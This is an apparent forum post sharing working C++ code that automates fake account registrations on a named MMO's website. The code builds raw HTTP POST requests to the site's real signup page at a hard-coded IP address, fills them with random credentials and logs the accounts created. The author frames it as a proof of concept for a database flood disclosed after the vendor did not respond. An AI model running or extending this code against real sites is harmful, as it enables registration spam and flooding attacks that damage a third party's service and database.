This is something that i made for the last mmo i tried called Kabod Online( sadly i have reported this issue to them and its still not fixed after 4 weeks )
This will show u how to properly build a POST/GET request without using wininet api's.
POC
This will show u how to properly build a POST/GET request without using wininet api's.
Code:
/*
KID POC -> lack of security in the account system ( FAKE USERS ) resulting on a database flood.
I will not release a true flooder cause i do not want theyre website/database being damaged by bad intentioned users.
*/
#pragma comment(lib,"wsock32.lib")
#include <windows.h>
#include <stdio.h>
#include <string>
#include <sstream>
#include <fstream>
std::string m_characters( "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890" );
static CHAR* m_emails [ 3 ] =
{
"hotmail.com",
"gmail.com",
"yahoo.com"
};
UINT GenerateInRange( UINT _min, UINT _max )
{
return ( ( rand( ) % ( UINT ) ( ( ( _max ) + 1 ) - ( _min ) ) ) + ( _min ) );
}
std::string GeneratePacket( UINT _seed, std::string *_data )
{
std::stringstream _form,_packet;
std::string _gen;
srand( _seed );
_packet << "POST /08member/member_join03_tempok.asp HTTP/1.1";
_packet << "\r\nAccept: text/html, application/xhtml+xml, */*";
_packet << "\r\nReferer: http://kabodonline.net/08member/member_join01_rule.asp";
_packet << "\r\nAccept-Language: en-US";
_packet << "\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)";
_packet << "\r\nContent-Type: application/x-www-form-urlencoded";
_packet << "\r\nAccept-Encoding: gzip, deflate";
_packet << "\r\nHost: kabodonline.net";
_packet << "\r\nConnection: Keep-Alive";
_packet << "\r\nCache-Control: no-cache";
_packet << "\r\nContent-Length: ";
_form << "id_chk=Y&userAccount=";
for( INT i = 0; i < 14; i++ ) //Username
_form << m_characters[ GenerateInRange( 0, m_characters.length( ) - 1 ) ];
*_data = _form.str();
for( INT i = 0; i < 14; i++ ) //Password
_gen += m_characters[ GenerateInRange( 0, m_characters.length( ) - 1 ) ];
_form << "&userPass1=" << _gen.c_str( ) << "&userPass2=" << _gen.c_str( );
_gen.clear( );
for( INT i = 0; i < 14; i++ )//Email
_gen += m_characters[ GenerateInRange( 0, m_characters.length( ) - 1 ) ];
_form << "&userEmail1=" << _gen.c_str( ) << "&userEmail2=" << m_emails[ GenerateInRange( 0, 2 ) ];
_gen.clear( );
//NOT CRUCIAL BUT STILL LAZY FROM THEM -.-' ( YEAR = MONTH ) ( MONTH = DAY ) ( DAY = YEAR )
_form << "&birthdayYear=" << GenerateInRange( 0, 12 );
_form << "&birthdayMonth=" << GenerateInRange( 0, 27 );
_form << "&birthdayDay=" << GenerateInRange( 1900, 1990 );
_form << "&x=" << GenerateInRange( 0, 200 );
_form << "&y=" << GenerateInRange( 0, 200 );
_packet << _form.str( ).length() << "\r\n\r\n" << _form.str( );
_form.clear( );
return _packet.str( );
}
BOOL SendFlood( std::string *_info )
{
WSADATA _data;
std::stringstream _recv;
struct sockaddr_in _service;
char _buffer [ MAX_SIZE_SECURITY_ID ] = { NULL };
if( WSAStartup( MAKEWORD( 2, 2 ), &_data ) != NO_ERROR )
return FALSE;
SOCKET _socket = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
if( _socket == INVALID_SOCKET )
return FALSE;
_service.sin_family = AF_INET;
_service.sin_addr.s_addr = inet_addr( "121.88.250.136" );
_service.sin_port = htons( 80 );
std::string _packet = GeneratePacket( GetTickCount( ), _info );
if( connect( _socket, reinterpret_cast< SOCKADDR* >( &_service ), sizeof( _service ) ) == SOCKET_ERROR )
{
closesocket( _socket );
WSACleanup( );
return FALSE;
}
if( send( _socket, _packet.c_str( ), _packet.length( ), 0 ) == SOCKET_ERROR )
{
closesocket( _socket );
WSACleanup( );
return FALSE;
}
if( shutdown( _socket, 1 ) == SOCKET_ERROR )
{
closesocket( _socket );
WSACleanup( );
return FALSE;
}
INT _result = 0;
do
{
memset( _buffer, NULL, MAX_SIZE_SECURITY_ID );
_result = recv( _socket, _buffer, MAX_SIZE_SECURITY_ID, 0 );
if( _result == NULL )
break;
_recv << _buffer;
}while( _result > 0 );
if( closesocket( _socket ) == SOCKET_ERROR )
{
WSACleanup( );
return FALSE;
}
WSACleanup();
return _recv.str( ).find( "url=member_join4_complete.asp" ) != std::string::npos ? TRUE : FALSE;
}
INT __stdcall WinMain( __in HINSTANCE hInstance, __in_opt HINSTANCE hPrevInstance, __in LPSTR lpCmdLine, __in int nShowCmd )
{
UNREFERENCED_PARAMETER( hInstance );
UNREFERENCED_PARAMETER( hPrevInstance );
UNREFERENCED_PARAMETER( lpCmdLine );
UNREFERENCED_PARAMETER( nShowCmd );
std::string _info;
MessageBox( GetForegroundWindow( ), "this will take some seconds\npress ok to start the test\n", "KID POC - START", MB_OK | MB_ICONINFORMATION );
for( INT i = 0; i < 5; i++ )
{
if( SendFlood( &_info ) == FALSE || _info.empty( ) )
continue;
std::ofstream _log( "status.txt", std::ios::app );
if( _log.is_open() == FALSE )
continue;
_log << "Created fake account: " << _info.c_str() << std::endl;
_log.close();
}
MessageBox( GetForegroundWindow( ), "please consult status.txt for information\npress ok to close", "KID POC - END", MB_OK | MB_ICONINFORMATION );
return EXIT_SUCCESS;
}
Originally posted by status.txt
Comment